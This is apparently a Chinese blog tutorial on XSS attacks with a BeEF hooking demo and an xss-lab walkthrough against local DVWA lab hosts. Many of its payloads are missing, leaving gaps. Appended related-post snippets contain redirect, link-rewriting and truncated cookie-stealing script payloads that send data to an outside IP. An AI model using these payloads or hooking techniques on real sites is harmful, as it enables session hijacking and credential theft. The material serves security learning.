xss跳转代码_XSS(跨站脚本攻击)

最新推荐文章于 2024-06-11 14:40:18 发布
最新推荐文章于 2024-06-11 14:40:18 发布
阅读量1.7k 收藏
点赞数
文章标签: xss跳转代码

XSS攻击流程

   1、攻击者将恶意代码注入到服务器中

2、用户在没有防备的情况下访问服务器

3、服务器将含有恶意代码的网页响应给客户端

4、在客户端浏览器中触发恶意的JS代码

XSS危害

1、盗取各种用户账号

2、窃取用户Cookie资料,冒充用户身份进入网站

3、劫持用户会话,执行任意操作

4、刷流量,执行弹窗广告

5、传播病毒

XSS漏洞的验证

POC  漏洞的验证与检测

EXP  漏洞的完整利用工具

shellcode 利用漏洞时,执行的代码

payload 攻击载荷(在sqlmap里是攻击代码的模块,在msf里与shellcode类似,功能是建立与目标的连接

验证XSS漏洞存在的PoC

            #常用         #弹出一个确认框          #弹出一个输入框

XSS的分类

一、反射型XSS与beef的使用

1、反射型 XSS 的 JS 代码在web参数(变量)中,如搜索框的反射型XSS,输入其他的字符不触发弹窗,当输入alert时才触发弹窗。

 Opening Web UI (http://127.0.0.1:3000/ui/panel)     #beef的web地址,用户名和密码都是beef以下链接是基于反射型XSS构造beef勾子的语句,beef的监听端口默认是3000把alert弹窗的语句改为beef攻击的语句,当有人执行这条语句时,就会被beef监听。http://192.168.1.132/DVWA/vulnerabilities/xss_r/?name=

当用户执行以上语句时,我们的beef成功勾了其主机,并且通过下图还能发现靶机的一些基本信息。

12bd5e76295d45390187587f1e813222.png

我们可以利用beef的alert弹窗警告模块,填入我们要展示的东西,就可以在靶机的浏览器进行展示,不仅仅有alert功能,还有其他的一些更加强大的功能。

5164b8d51a952414c2ed52a69e8166a4.png

cf1f5f20098ed7d9e3854a6f067c8850.png

下面我们将运用beef的屏幕截取功能,对靶机的当前屏幕进行截取,如下图所示

97dced93b109c05b6440d1121beed327.png

当然我们也可以对靶机的浏览器进行重定向,操作如图所示,靶机浏览器页面成功跳转到百度,不仅仅有这些还有其他更加强大的功能。

6d3180c169981f90ef4127e3389e6cd4.png

二、储存型XSS

1、储存型XSS是持久性跨站脚本,持久的意思是写进数据库或者文件中可以永久保存。如留言板

ag:

在后端代码过滤引号反斜杠的情况下,可以用charcode对引号的内容进行转换,xss2——>120,115,115,50,

 

储存型xss在用beef进行勾取时的原理,当有用户或者管理员访问这个网页时,就会被beef所勾取。

 http://192.168.1.132/DVWA/vulnerabilities/xss_s/

当我们用beef成功勾取时,可以通过Deta

三、DOM型XSS

1、DOM型XSS是通过修改浏览器页面的DOM树而执行的。

ag:

 【#message=alert(/xss/)】#取得message等号后面的语句,【#】号后面是锚点,锚点的内容不会提交到服务器,只在浏览器执行

XSS构造

1、利用【<>】构造HTML和标签

     alert(/xss/)       #没有对script进行过滤    alert("XSS")      #对script进行了过滤,但是没有对大小写进行严格的过滤

2、伪协议

 touch me!       #提交参数,点击超链接,触发xss                     #使用img标签的伪协议

3、通过事件触发XSS

       #这个标签引入一个图片,当鼠标悬停于图片时,会触发XSS代码            #构造一个单行的文本输入框,当点击键盘任意一个按键时触发XSS              #当按住键盘不松时不会触发XSS,当松开键盘时才触发            #构造一个按钮,当我们点击按钮时触发XSS

xss-lab通关

level1

链接:http://192.168.1.132/xss/level1.php?name=test

尝试把test改为test1,查看页面变换,页面正常输出test1(由此也可以判断其可能存在的是一个反射型的xss),如果要进行xss攻击,要用到 JS ,所以对 JS 常用的符号进行测试。

链接:

 http://192.168.1.132/xss/level1.php?name=

发现">也能正常回显,证明后端代码没有对这些特殊字符进行过滤,这时候可以用<>进行 JS 构造弹窗

很明显我们可以构造以下的 JS 对目标进行xss

http://192.168.1.132/xss/level1.php?name=

weixin_39564831
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss跳转代码_XSS漏洞(恶意链接)
weixin_39994806的博客
11-20 1358
一、环境:DVWA二、修改网页链接1、点击下面的网址,访问的是不同的内容2、通过xss漏洞,修改这些网址都指向百度window.onload:当窗口加载时,执行匿名函数<script>window.onload=function(){ var link=document.getElementsByTagName("a"); for(j=0;j<link.length;j++){ ...
DVWA XSS
weixin_46429206的博客
12-03 186
低 弹窗: <script>alert('xss')</script> <a href=’’ onclick=alert(‘你是傻子吧!’)>美女图片</a> 重定向:<script>window.location="http://www.4399.com"</script> 点击forward跳转下一界面 Cookie:<script>new Image().src=”http://192.168.116.1
xss跳转代码_记一次渗透测试从XSS到Getshell过程(详细到无语)
weixin_39671631的博客
11-22 919
0X00前言前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。0X01钓鱼到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。于是我打开这个站看...
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)_xss绕过
最新发布
weixin_42340783的博客
06-11 1333
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
一些经典的XSS跨站代码整理
主题模板站的博客
01-31 555
base64,>>有趣的isindex 興味深いhttp://jsbin.com/inekab for Opera only。IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
web漏洞之payload
hdquan321的博客
04-30 7784
什么是payload? payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。 也有人把payloads称 为shellcode。 Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 payload有几种类型: 1、sing...
CTFHub XSS DOM跳转 WriteUp
柠檬i的博客
07-05 2089
跳转 XSS 的攻击方式涉及将恶意脚本嵌入到跳转链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用跳转 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止跳转 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和转义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止跳转 XSS 的关键。
利用PHP编程防范XSS跨站脚本攻击
03-04
跨站攻击很容易就可以构造,而且非常隐蔽,不易被查觉(通常盗取信息后马上跳转回原页面)。在此主要谈谈如何防范。首先,跨站脚本攻击都是由于对用户的输入没有进行严格的过滤造成的,所以我们必须在所有数据进入...
DOM-XSS漏洞的挖掘与攻击面延伸.pptx
10-15
* 跳转:攻击者可以使用 JavaScript 语法将页面进行跳转操作,从而 inject 恶意脚本。 * postMessage:攻击者可以使用 postMessage API 来 inject 恶意脚本,从而获取敏感信息。 * window.name:攻击者可以使用 ...
YXcms-含有存储型XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储型XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储型跨站脚本(Stored Cross-Site Scripting,简称存储型XSS)漏洞。这种漏洞允许...
login_jsp.zip_login. jsp代码_login.jsp_login.jsp代码_military753
09-14
"military753"这个标签可能暗示了这个示例代码可能是军事或安全相关的项目,因此在处理用户登录时,安全措施尤为重要,如防止SQL注入、XSS攻击等。 总结来说,"login.jsp"文件展示了如何使用JSP来实现用户登录功能...
demo.zip_ASP支付代码_DEMO_thykt_网银
09-21
5. **安全性和验证**:在ASP代码中,确保交易安全是至关重要的,这可能涉及到SSL加密、数据签名、防止SQL注入和XSS攻击等措施。 6. **错误处理和日志记录**:在处理支付时,良好的错误处理机制和日志记录可以追踪并...
完整XSS wrom入侵流程
jahn的专栏
11-08 792
完整XSS wrom入侵流程不说废话,且看怎么实现,我先拿SOHU BLOG做示范.1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,//前是真正的空格),在个人档案处看过滤了哪些.’’;:!--"=&#{()} //结果’’;:!--"=&#{()} // (&后是amp,论坛过滤了)过滤了"javascript","&"和"/"这两个
Web之XSS
qq_62803993的博客
01-09 315
(1)输入在标签间的情况:测试是否被过滤或转义,若无则直接(2)输入在 script标签内:我们需要在保证内部JS语法正确的前提下,去插入我们的 payload。如果我们的输岀在字符串内部,测试字符串能否被闭合。如果我们无法闭合包裹字符串的引号,这个点就很难利用了可能的解决方案:可以控制两处输入且\可用、存在宽字节(3)输入在HTML属性內:首先査看属性是否有双引号包裏、没有则直接添加新的事件属性;
实现完整的XSS wrom流程
weixin_34221276的博客
01-05 337
文/茄子宝 1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些. '';:!--"=&amp;#{()} \/ 结果 ”;:!–”=&#{()} // (&后是amp,论坛过滤了) 过滤了”javascript”,”&am...
04. XSS漏洞原理
weixin_43909650的博客
12-16 1042
2022网安冬令营(web安全/渗透测试/实战训练)——蚁景网安 https://ke.qq.com/course/5874132#term_id=106089914
xss详解(一)
捷的博客
04-11 632
文章目录XSS详解(一)一、概述二、XSS的分类2.1反射型XSS2.2存储型XSS2.3DOM型XSS三、常见XSS攻击向量四、xss测试流程图 XSS详解(一) 一、概述 XSS(Cross Site Scripting)缩写为CSS,因易与层叠样式表CSS混淆,所以将跨站脚本攻击缩写为XSSXSS攻击(跨站脚本攻击)通常指的是通过网页开发时留下的漏洞,注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。 产生的原因通常是在开发阶段没有实施过滤或净化措施、或过滤的不严格。 这些恶意网
XSS详解
热门推荐
金色%夕阳的博客
07-30 1万+
XSS详解 1. 简介 2. 跨站脚本实例 3. XSS 的危害 4. 分类 4.1 反射型XSS(非持久型) 漏洞成因 攻击流程 4.2 存储型XSS(持久型) 漏洞成因 攻击流程 4.3 DOM型XSS 漏洞成因 4.4 通用型XSS 漏洞成因
xss攻击中受影响的是服务器还是客户端,安全测试基础之 XSS
weixin_42131342的博客
08-01 1132
在web项目安全漏洞中,XSS是最为流程的漏洞类型之一,今天就来介绍一下XSS。01—XSS介绍跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。02—XSS分类XSS简单的说就是没有做好校验,因为前端的用户输入的数据别人可以拦截,然后嵌入一些脚本代码或者其它的而达到不良的结果,有点类似与...
「2021」高频前端面试题汇总之浏览器原理篇.pdf
12-14
「2021」高频前端面试题汇总之浏览器原理篇.pdf

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值